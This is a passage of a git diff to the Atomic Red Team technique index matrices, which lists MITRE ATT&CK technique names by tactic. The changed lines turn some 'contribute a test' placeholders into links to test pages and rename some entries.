 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Rootkit](../../T1014/T1014.md) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Exec Into Container](../../T1609/T1609.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Local System](../../T1005/T1005.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Archive Collected Data](../../T1560/T1560.md) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -36,7 +36,7 @@
 |  | Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
 |  |  | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Steal Application Access Token](../../T1528/T1528.md) | [Query Registry](../../T1012/T1012.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -54,7 +54,7 @@
 |  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) |  |  |  |  |  |  |
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
-|  |  | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
+|  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
@@ -109,7 +109,7 @@
 |  |  | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) |  | LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) |  | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) |  |  |  |  |  |  |  |
 |  |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) |  | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
+|  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) |  | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) |  |  |  |  |  |  |  |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index 1f2b376a..a93f0743 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -7,15 +7,15 @@
 | [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [OS Credential Dumping](../../T1003/T1003.md) | [Group Policy Discovery](../../T1615/T1615.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Replication Through Removable Media](../../T1091/T1091.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | [Automated Exfiltration](../../T1020/T1020.md) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | [Service Stop](../../T1489/T1489.md) |
+| [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | [Service Stop](../../T1489/T1489.md) |
 | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
